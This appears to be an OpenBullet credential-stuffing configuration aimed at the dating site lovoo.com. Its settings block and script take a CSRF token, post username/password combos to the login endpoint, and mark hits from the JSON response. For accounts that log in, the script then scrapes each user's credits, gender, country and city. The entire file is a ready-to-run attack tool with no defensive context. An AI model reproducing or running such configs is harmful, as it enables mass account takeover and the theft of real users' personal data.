[SETTINGS]
{
  "Name": "lovoo.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-17T18:44:25.0586023+01:00",
  "AdditionalInfo": "",
  "Author": "Coaster",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.lovoo.com/login_check" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES(lovoocsrf)>" LR "" "" -> VAR "1" 

REQUEST POST "https://www.lovoo.com/login_check" 
  CONTENT "_username=<USER>&_password=<PASS>&_remember_me=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.lovoo.com" 
  HEADER "pragma: no-cache" 
  HEADER "public: true" 
  HEADER "referer: https://www.lovoo.com/" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" 
  HEADER "x-csrf-token: <1>" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7" 
  HEADER "app: lovoo" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 73" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":false,\"message\":\"Bad credentials\"}" 
  KEYCHAIN Success OR 
    KEY "{\"success\":true,\"user\":{},\"referer\":\"/welcome/login\"}" 

REQUEST GET "https://www.lovoo.com/settings/account" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://www.lovoo.com/self" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "},\"credits\":" ",\"locations\":{\"" -> CAP "Credits" 

PARSE "<SOURCE>" LR "\",\"gender\":" ",\"age\":" -> CAP "Gender" 

PARSE "<SOURCE>" LR "\",\"country\":\"" "\",\"lat\":38.804111" -> CAP "Country" 

PARSE "<SOURCE>" LR "\":{\"city\":\"" "\",\"country" -> CAP "City" 

